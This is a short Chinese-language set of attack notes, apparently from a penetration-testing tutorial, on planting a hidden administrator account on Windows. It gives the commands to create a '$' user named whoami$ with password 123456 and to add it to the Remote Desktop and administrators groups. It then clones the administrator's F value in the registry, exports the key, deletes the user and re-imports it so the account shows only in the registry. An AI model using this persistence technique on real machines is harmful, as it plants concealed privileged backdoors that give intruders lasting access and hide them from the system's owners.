net user whoami$ 123456 /add
net user 无法看到whoami$用户
控制面板-用户账户
用户和组 lusrmgr.msc
直接远程登录
net localgroup //查看组
net localgroup “Remote Desktop users” whoami$ /add //添加远程桌面组
低权限用户 啥也干不了 除非提权。
net localgroup administrators $ /add //加入管理员组后远程桌面
进入到注册表项 无法进入到用户注册表项
给当前用户赋予权限然后再重新进入到注册表
如图 可以进入到用户注册表项了。
复制administrator的F值到whoami$的F值中 拥有administrator权限
administrator注册表项空及键值对
whoami$注册表项及键值对
导出whoami$注册表项及键值对
net user whoami$ /del
将whoami$的注册表项及键值对导入注册表
如图 添加成功
再次检查whoami$用户
查看控制面板
查看用户和组
只能在注册表看到该用户